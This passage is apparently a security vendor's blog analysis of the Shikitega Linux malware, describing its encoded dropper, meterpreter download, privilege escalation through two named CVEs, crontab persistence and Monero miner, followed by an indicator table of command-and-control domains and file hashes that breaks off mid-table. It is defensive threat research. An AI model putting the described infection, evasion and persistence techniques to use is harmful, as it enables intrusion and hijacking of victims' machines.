								<div class="menu-header">Security Use Cases</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/intrusion-detection-system">Intrusion Detection</a></li>
									<li><a href="/solutions/secure-access-service-edge">Secure Access Service Edge</a></li>
									<li><a href="/solutions/secure-web-gateway">Secure Web Gateway</a></li>
									<li><a href="/solutions/siem-platform-solutions ">SIEM Platform Solutions</a></li>
									<li><a href="/solutions/extended-detection-and-response">XDR</a></li>
									<li><a href="/solutions/zero-trust-architecture">Zero Trust Architecture</a></li>

								</ul>
							</div>
						</div>
						<div class="dd-bottom visible-md visible-lg" id="view-all-solutions">
							<div class="container-fluid">
								<a href="/solutions">
									<span class="view-all-text">View All Solutions &LongRightArrow;</span>
								</a>
							</div>
						</div>
					</div>
				</li>
				<li class="nav-item has-dd partners">
					<a id="main-nav-partners" href="/partners" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#partners-dd">Partners<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="partners-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-partners-mobile" href="/partners/become-a-partner">Become a Partner</a></li>
							</ul>
							<div id="become-a-partner">
								<div class="menu-header">Become a Partner</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/partners">All Partner Programs</a></li>
									<li><a href="/partners/mssp-program">MSSP Program</a></li>
									<li><a href="/partners/resellers">Reseller Program</a></li>
									<li><a href="/partners/partner-portal/">Partner Portal Login</a></li>
								</ul>
							</div>

							<div id="find-a-partner">
								<div class="menu-header">Find a Partner</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/partners/find-partner">Find an MSSP</a></li>
									<li><a href="/partners/locator">Find a Reseller</a></li>
									<li><a href="/partners/certified-implementation-partners">Professional Services</a></li>
								</ul>
							</div>
							<div id="technology-partners">
								<div class="menu-header">Technology Partners</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/app">USM Anywhere Integrations</a></li>
									<li><a href="/partners/technology-partners">OTX Partners</a></li>
								</ul>
							</div>
						</div>
						<div class="dd-bottom visible-md visible-lg" id="view-all-partners">
							<div class="container-fluid">
								<a href="/partners/become-a-partner">
									<span class="view-all-text">Become a Partner &LongRightArrow;</span>
								</a>
							</div>
						</div>
					</div>
				</li>
				<li class="nav-item has-dd resources">
					<a id="main-nav-resources" href="/resource-center#language_en" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#resources-dd">Resources<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="resources-dd">
						<div class="dd-multi-col container-fluid">

							<div id="resources-menu-image" class="visible-lg">
								<img src="https://cdn-cybersecurity.att.com/images/uploads/thehub-thumbnail.jpg">
								<p>Explore The Hub, our home for all virtual experiences</p>
								<a href="https://hub.att.com/expo-hall/cybersecurity/">Explore now ⟶</a>
							</div>

							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-resources-mobile" href="/resource-center#language_en">View All Resources</a></li>

							</ul>

							<div id="product-resources">
								<div class="menu-header">Product Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#content_customer-stories">Customer Stories</a></li>
									<li><a href="/resource-center#content_product-brief">Product Briefs</a></li>
									<li><a href="/resource-center#content_product-demo">Product Demos</a></li>
									<li><a href="/resource-center#content_product-review">Product Reviews</a></li>
									<li><a href="/resource-center#content_solution-brief">Solution Briefs</a></li>
									<li><a href="/resource-center#content_use-cases">Use Cases</a></li>

									<li><a id="free-trial" href="/products/usm-anywhere/free-trial">Free Trial</a></li>
								</ul>
							</div>
							<div id="security-resources">
								<div class="menu-header">Security Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#content_analyst-reports">Analyst Reports</a></li>
									<li><a href="/blogs">Blogs</a></li>
									<li><a href="/resource-center#content_ebook">eBooks</a></li>
									<li><a href="/resource-center#content_video">Videos</a></li>
									<li><a href="/resource-center#content_webcast">Webcasts</a></li>
									<li><a href="/resource-center#content_white-paper">White Papers</a></li>
									<li><a href="/resource-center#content_industry-reports">Industry Reports</a></li>
								</ul>
							</div>
							<div id="customer-resources">
								<div class="menu-header">Customer Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="https://success.alienvault.com/">Success Center</a></li>
									<li><a href="/certification">Certification</a></li>
									<li><a href="/customer-success">Customer Success</a></li>
									<li><a href="/documentation">Documentation</a></li>
									<li><a href="/partners/certified-implementation-partners">Professional Services</a></li>
									<li><a href="/support">Support Overview</a></li>
									<li><a href="/training">Training</a></li>
								</ul>
							</div>
							<div id="browse-by-topic">
								<div class="menu-header">Browse by Topic</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#category_incident-response">Incident Response</a></li>
									<li><a href="/resource-center#category_intrusion-detection">Intrusion Detection</a></li>
									<li><a href="/resource-center#category_partner-mssp-reseller">Partner: MSSP &amp; Reseller</a></li>
									<li><a href="/resource-center#category_regulatory-compliance">Regulatory Compliance</a></li>
									<li><a href="/resource-center#category_soc">Security Operations Center</a></li>
									<li><a href="/resource-center#category_siem-log-management">SIEM &amp; Log Management </a></li>
									<li><a href="/resource-center#category_threat-detection">Threat Detection</a></li>
									<li><a href="/resource-center#category_threat-intelligence">Threat Intelligence</a></li>
								</ul>
							</div>
						</div>

						<div class="dd-bottom visible-md visible-lg" id="view-all-resources">
							<div class="container-fluid">
								<a href="/resource-center#language_en">
									<span class="view-all-text">View All Resources &LongRightArrow;</span>
								</a>
							</div>
						</div>

					</div>
				</li>
				<li class="nav-item alien-labs">
					<a id="main-nav-alien-labs" href="/alien-labs" class="">AT&T Alien Labs</a>
				</li>
				<li class="nav-item visible-sm visible-xs">
					<a id="main-nav-contact" href="/contact">Contact</a>
				</li>
				<li class="nav-item support visible-sm visible-xs">
					<a id="main-nav-support" href="/support">Support</a>
				</li>

			</ul>
		</nav>

	</div>

	<div class="container-fluid visible-md visible-lg">
		
		
			<a id="main-nav-free-tools" class="header-nav-btn btn margin-bottom10" href="/pricing/request-quote">Get price</a>
		


	</div>
</header>

						




			<main class="blog-detail flexible-layout">
		<section id="blog-top-subnav" class="blog-subnav">
	<div class="blog-top-subnav-wrap">
		<div class="container-fluid">
			<div class="row">
				<ul id="blog-top-subnav-list">
					<li>Categories:</li>
					<li class=""><a href="/blogs">All
							blogs</a></li>
					<li class=""><a
							href="/blogs/security-essentials">Security essentials</a></li>
					<li class="active"><a href="/blogs/labs-research">AT&T Alien
							Labs research</a></li>
				</ul>
				<div class="blog-search search hidden visible-lg visible-md">
					<form action="/search-results" method="get" id="blog-search-form" __bizdiag="113" __biza="WJ__">
						<input name="q" id="blog-search-form-text" type="text" placeholder="Search"
							aria-label="Search"><button type="submit"><span
								class="glyphicon glyphicon-search"></span></button></form>
				</div>
				<div class="blog-top-subnav-mobile-wrap clearfix">
					<a href="#" class="ddm-toggle collapsed" data-toggle="collapse"
						data-target="#blog-top-subnav-mobile">Categories <i class="down"></i></a>
					<ul id="blog-top-subnav-mobile" class="collapse">
						<li class=""><a href="/blogs">All
								blogs</a></li>
						<li class=""><a
								href="/blogs/security-essentials">Security essentials</a></li>
						<li class="active"><a href="/blogs/labs-research">AT&T
								Alien Labs research</a></li>
						<li>
							<div class="blog-search search margin-bottom20">
								<form action="/search-results" method="get" id="blog-search-form" __bizdiag="113"
									__biza="WJ__"><input name="q" id="blog-search-form-text" type="text"
										placeholder="Search" aria-label="Search"><button type="submit"><span
											class="glyphicon glyphicon-search"></span></button></form>
							</div>
						</li>
					</ul>
				</div>
			</div>
		</div>
	</div>
</section>

<style>
	

	/* for snap scrolling */
	.blog-subnav {
		position: relative;
		min-height: 0 !important;
    	height: 40px;
	}
	@media (max-width:991px) {
		.blog-subnav {
			height: 60px;
			line-height:60px;
		}

	}

	.blog-top-subnav-wrap {
		position: relative;
		margin-right: 0px;
		background: #f2f2f2;
	}

	.blog-top-subnav-wrap.affix {
		position: fixed;
		width: 100%;
		top: 0;
		left: 0;
	}

	.blog-top-subnav-wrap.transition-primary {
		overflow: hidden;
		-webkit-transition: transform .3s ease;
		transition: transform .3s ease;
	}

	.blog-top-subnav-wrap.transition-primary.scroll-affix {
		transform: translateY(0) !important;
	}


	.hh .blog-top-subnav-wrap.affix.transition-primary {
		height: auto;
	}

	.hh .blog-top-subnav-wrap {
		min-height: auto;
	}

	.hh .blog-top-subnav-wrap {
		position: relative;
		transform: translateY(0);
	}

	.hh .blog-top-subnav-wrap.affix {
		position: fixed;
		width: 100%;
		top: 0;
		left: 0;
	}

	.hh .blog-top-subnav-wrap.transition-primary {
		transform: translateY(-110px);
		-webkit-transform: translateY(-110px);
	}

	.hh .blog-top-subnav-wrap.scroll-affix {
		transform: translateY(0);
		-webkit-transform: translateY(0);
		z-index: 998;
	}
</style>

				<section class="full-width-block">

					<div class="container-fluid">

						<div class="row flx-container">
							<div class="col-sm-7">
								<div class="blog-content-area">
									<div class="section-breadcrumb">
										  <ol class="m-bread-crumb-list l-bread-crumb-list" itemscope="" itemtype="http://schema.org/BreadcrumbList">

											  <li itemprop="itemListElement" itemscope="" itemtype="http://schema.org/ListItem">
												  <a itemprop="item" href="https://cybersecurity.att.com">
													  <span itemprop="name" style="padding-right: 10px;">AT&T Cybersecurity</span> <span class="glyphicon glyphicon-chevron-right"></span></a>
												  <meta itemprop="position" content="1">
											  </li>
											  <li itemprop="itemListElement" itemscope="" itemtype="http://schema.org/ListItem">
												  <a itemprop="item" href="https://cybersecurity.att.com/blogs">
													  <span itemprop="name" style="padding-left: 10px;">Blog</span></a>
												  <meta itemprop="position" content="2">
											  </li>
										  </ol>
									  </div>
									<div class="blog-title-date-author-area">
										<h1>Shikitega - New stealthy malware targeting Linux</h1>
										<div class="date">September 6, 2022 &nbsp;|&nbsp; <a href="/blogs/author/ofer-caspi">Ofer Caspi</a></div>
									</div>
									<div class="blog-body">
										<h2>Executive summary</h2>

<p>AT&amp;T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are running Linux operating systems. Shikitega is delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.</p>

<h2>Key takeaways:</h2>

<ul>
	<li>The malware downloads and executes the Metasploit&rsquo;s &ldquo;Mettle&rdquo; meterpreter to maximize its control on infected machines.</li>
	<li>Shikitega exploits system vulnerabilities to gain high privileges, persist and execute crypto miner.</li>
	<li>The malware uses a polymorphic encoder to make it more difficult to detect by anti-virus engines.</li>
	<li>Shikitega abuse legitimate cloud services to store some of its command and control servers (C&amp;C).</li>
</ul>

<h3><img alt="Shikitega" data-original="https://cdn-cybersecurity.att.com/blog-content/shikitega.jpg" /></h3>

<p style="text-align:center">Figure 1. Shikitega operation process.</p>

<h2>Background</h2>

<p><a href="https://atlasvpn.com/blog/linux-malware-on-a-rise-reaching-all-time-high-in-h1-2022" target="_blank">With a rise of nearly 650%</a> in malware and ransomware for Linux this year, reaching an all-time high in the first half year of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. New malwares like <a href="https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits" target="_blank">BotenaGo</a> and <a href="https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers" target="_blank">EnemyBot</a> are examples of how malware writers rapidly incorporate&nbsp; recently discovered vulnerabilities to find new victims and increase their reach.</p>

<p>Shikitega uses an infection chain in multiple layers, where the first one contains only a few hundred bytes, and each module is responsible for a specific task, from downloading and executing Metasploit meterpreter, exploiting Linux vulnerabilities, setting persistence in the infected machine to downloading and executing a cryptominer.</p>

<h2>Analysis</h2>

<p>The main dropper of the malware is a very small ELF file, where its total size is around only 370 bytes, while its actual code size is around 300 bytes. (figure 2)</p>

<p><img alt="Malicious ELF" data-original="https://cdn-cybersecurity.att.com/blog-content/malicious_ELF.jpg" /></p>

<p style="text-align:center">Figure 2. Malicious ELF file with a total of only 376 bytes.</p>

<p>The malware uses the &ldquo;<a href="https://en.wikipedia.org/wiki/Shikata_ga_nai">Shikata Ga Nai</a>&rdquo; polymorphic XOR additive feedback encoder, which is one of the most popular encoders used in Metasploit. Using the encoder, the malware runs through several decode loops, where one loop decodes the next layer, until the final shellcode payload is decoded and executed. The encoder stud is generated based on dynamic instruction substitution and dynamic block ordering. In addition, registers are selected dynamically.&nbsp; Below we can see how the encoder decrypts the first two loops: (figures 3 and 4)</p>

<p><img alt="Shikitega decryption" data-original="https://cdn-cybersecurity.att.com/blog-content/shikata_decryption_1.jpg" /></p>

<p style="text-align:center">Figure 3. First &ldquo;Shikata Ga Nai&rdquo; decryption loop.</p>

<p style="text-align:center"><img alt="Shikata decryption 2" data-original="https://cdn-cybersecurity.att.com/blog-content/shikata_decryption_2.jpg" /></p>

<p style="text-align:center">Figure 4. Second &ldquo;Shikata Ga Nai&rdquo; decryption loop created by the first one.</p>

<p>After several decryption loops, the final payload shellcode will be decrypted and executed. As the malware does not use any imports, it uses &lsquo;int 0x80&rsquo; to execute the appropriate syscall. As the main dropper code is very small, the malware will download and execute additional commands from its command and control by calling 102 syscall (sys_socketcall). (Figure 5)</p>

<p><img alt="Interrupts" data-original="https://cdn-cybersecurity.att.com/blog-content/interrupts.jpg" /></p>

<p style="text-align:center">Figure 5. Calling system functions using interrupts</p>

<p>The C&amp;C will respond with additional shell commands to execute, as seen in the packet capture in figure 6. The first bytes marked in blue are the shell commands that the malware will execute.</p>

<p><img alt="CnC commands" data-original="https://cdn-cybersecurity.att.com/blog-content/CnC_commands.jpg" /></p>

<p style="text-align:center">Figure 6. Additional commands received from C&amp;C.</p>

<p>The received command will download additional files from the server that won&rsquo;t be stored in the hard drive, but rather will be executed from memory only. (Figure 7)</p>

<p><img alt="Shikitega shell code" data-original="https://cdn-cybersecurity.att.com/blog-content/shikitega_shell_code.jpg" /></p>

<p style="text-align:center">Figure 7. Executes additional shell code received from C&amp;C.</p>

<p>In other malware versions, it will use the &ldquo;execve&rdquo; syscall to execute &lsquo;/bin/sh&rsquo; with command received from the C&amp;C. (figure 8)</p>

<p><img alt="Syscall" data-original="https://cdn-cybersecurity.att.com/blog-content/syscall.jpg" /></p>

<p style="text-align:center">Figure 8. Executing shell commands by using syscall_execve.</p>

<p>The malware downloads and executes &lsquo;<a href="https://github.com/rapid7/mettle" target="_blank">Mettle</a>&rsquo;, a Metasploit meterpreter that allows the attacker to use a wide range of attacks from webcam control, sniffer, multiple reverse shells (tcp/http..), process control, execute shell commands and more.&nbsp;</p>

<p>In addition the malware will use wget to download and execute the next stage dropper.</p>

<h2>Next stage dropper</h2>

<p>The next downloaded and executed file is an additional small ELF file (around 1kb) encoded with the &ldquo;Shikata Ga Nai&rdquo; encoder. The malware decrypts a shell command that will be executed by calling syscall_execve with &lsquo;/bin/sh&rdquo; as a parameter with the decrypted shell. (Figure 9)</p>

<p><img alt="decrypt 2" data-original="https://cdn-cybersecurity.att.com/blog-content/decrypt_2.jpg" /></p>

<p style="text-align:center">Figure 9. Second stage dropper decrypts and executes shell commands.</p>

<p>The executed shell command will download and execute additional files. To execute the next and last stage dropper, it will exploit two linux vulnerabilities to leverage privileges - <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034" target="_blank">CVE-2021-4034</a> and <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493" target="_blank">CVE-2021-3493</a> (figure 10 and 11).</p>

<p><img alt="exploit linux vuln" data-original="https://cdn-cybersecurity.att.com/blog-content/exploit_linux_vuln.jpg" /></p>

<p style="text-align:center">Figure 10. Exploiting Linux vulnerability CVE-2021-3493.</p>

<p><img alt="exploit second linux vuln" data-original="https://cdn-cybersecurity.att.com/blog-content/exploit_second_linux_vuln.jpg" /></p>

<p style="text-align:center">Figure 11. Exploiting CVE-2021-4034 vulnerability.</p>

<p>The malware will leverage the exploit to download and execute the final stage with root privileges - persistence and cryptominer payload.</p>

<h2>Persistence</h2>

<p>To achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting 4 crontabs, two for the current logged in user and the other two for the user root. It will first check if the crontab command exists on the machine, and if not, the malware will install it and start the crontab service.</p>

<p>To make sure only one instance is running, it will use the <a href="https://linux.die.net/man/2/flock">flock</a> command with a lock file &ldquo;/var/tmp/vm.lock&rdquo;.</p>

<p><img alt="flock command" data-original="https://cdn-cybersecurity.att.com/blog-content/flock_command.jpg" /></p>

<p style="text-align:center">Figure 12. Adding root crontab to execute the final payload.</p>

<p>Below is the list of downloaded and executed script to achieve persistence:</p>

<table style="border-collapse:collapse">
	<thead>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:1px solid black; width:312px">
			<p style="text-align:center">script name</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:1px solid black; width:312px">
			<p style="text-align:center">details</p>
			</td>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>unix.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Check if &ldquo;crontab&rdquo; commands exist in the system, if not install it and start the crontab service.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>brict.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds crontab for current user to execute cryptominer.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>politrict.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds root crontab to execute cryptominer.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>truct.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds crontab for current user to download cryptominer and config from C&amp;C.</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; border-top:none; width:312px">
			<p>restrict.sh</p>
			</td>
			<td style="border-bottom:1px solid black; border-left:none; border-right:1px solid black; border-top:none; width:312px">
			<p>Adds root crontab to download cryptominer and config from C&amp;C.</p>
			</td>
		</tr>
	</tbody>
</table>

<p>&nbsp;</p>

<p>As the malware persists with crontabs, it will delete all downloaded files from the system to hide its presence.</p>

<h2>Cryptominer payload</h2>

<p>The malware downloads and executes XMRig miner, a popular miner for the Monero cryptocurrency. It will also set a crontab to download and execute the crypto miner and config from the C&amp;C as mentioned in the persistence part above.</p>

<p><img alt="XMRig" data-original="https://cdn-cybersecurity.att.com/blog-content/xmrig.jpg" /></p>

<p style="text-align:center">Figure 13. XMRig miner is downloaded and executed on an infected machine.</p>

<h2>Command and control</h2>

<p>Shikitega uses cloud solutions to host some of its command and control servers (C&amp;C) as shown by <a href="https://otx.alienvault.com/indicator/hostname/dash.cloudflare.ovh" target="_blank">OTX</a> in figure 14. As the malware in some cases contacts the command and control server using directly the IP without domain name, it&rsquo;s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time.</p>

<p><img alt="CnC on legit host" data-original="https://cdn-cybersecurity.att.com/blog-content/cnc_on_legit_host.jpg" /></p>

<p style="text-align:center">Figure 14. Command and control server hosted on a legitimate cloud hosting service.</p>

<h2>Recommended actions</h2>

<ol>
	<li>Keep software up to date with security updates.</li>
	<li>Install Antivirus and/or EDR in all endpoints.</li>
	<li>Use a backup system to backup server files.</li>
</ol>

<h2>Conclusion</h2>

<p>Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection. Shiketega malware is delivered in a sophisticated way, it uses a polymorphic encoder, and it gradually delivers its payload where each step reveals only part of the total payload. In addition, the malware abuses known hosting services to host its command and control servers. Stay safe!</p>

<h2>Associated Indicators (IOCs)</h2>

<p>The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the <a href="https://otx.alienvault.com/pulse/630e1e801a01e2ba23ed7f44" target="_blank">OTX Pulse</a>. Please note, the pulse may include other activities related but out of the scope of the report.</p>

<table style="border-collapse:collapse">
	<tbody>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:1px solid #959595; height:26px; width:97px">
			<p>TYPE</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:1px solid #959595; height:26px; width:311px">
			<p>INDICATOR</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:1px solid #959595; height:26px; width:216px">
			<p>DESCRIPTION</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>DOMAIN</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>dash[.]cloudflare.ovh</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Command and control</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>DOMAIN</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>main[.]cloudfronts.net</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Command and control</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
